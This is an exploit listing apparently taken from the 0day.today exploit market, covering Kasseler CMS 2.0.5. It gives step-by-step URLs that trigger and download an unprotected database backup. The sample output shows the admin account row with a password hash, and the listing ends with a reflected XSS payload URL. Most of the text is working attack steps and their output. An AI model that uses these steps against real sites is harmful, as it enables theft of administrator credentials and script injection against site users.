[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Kasseler CMS 2.0.5 => By Pass / Download Backup Vulnerability

Author
indoushka
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12000
Category
web applications
Date add
26-04-2010
Platform
php
=============================================================
Kasseler CMS 2.0.5 => By Pass / Download Backup Vulnerability
=============================================================

========================================================================================                 
| # Title    : kasseler cms 2.0.5 => by Pass / Download Backup Vulnerability  
| # Author   : indoushka                                                              
| # email    : indoushka@hotmail.com                                                                                                                                                                   
| # Dork     : Copyright ©2007-2009 by Kasseler CMS. All rights reserved.                                                                                                               
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0)       
| # Bug      : Backup    
                                                             
======================      Exploit By indoushka       =================================
# Exploit  : 
 
1 - http://127.0.0.1/kasseler/backup.php
 
File size: 37.38 KB
Tables processed: 39
Rows processed: 37
 
2 - http://127.0.0.1/uploads/backup/auto_2010-04-27_14-29.sql
 
in lig 645:668 col 1 you found the login information
 
INSERT INTO `kasseler_users` VALUES
(-1, 'guest', 'Guest', '', '', 'default.png', '0000-00-00 00:00:00', 'default', 0, '', '', '', '', '', 5, '', '0', '', '0000-00-00 00:00:00', '', '', '0000-00-00', 0, '', '', '', '', '', '', 0, -1, 0, 0, 0, 0, 0, 0, '', 0, 'MBzx97cQMjKQ47tJgil9PBQDr', 1, 0, 0, '0.00', 0, 1, NULL),
(1, 'admin', 'admin', 'admin@127.0.0.1', 'http://127.0.0.1/', 'admin.png', '2010-04-27 11:25:22', 'default', 2, NULL, NULL, NULL, NULL, 'd0970714757783e6cf17b26fb8e2298f', 1, NULL, '0.0.0.0', 'N/A', '0000-00-00 00:00:00', 'N/A', 'N/A', '0000-00-00', 0, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, NULL, 1, 0, 0, '0.00', 0, 1, NULL);
 
3 - XSS :
 
http://127.0.0.1/index.php?online/<script>alert(213771818860)</script>



#  0day.today [2024-12-25]  #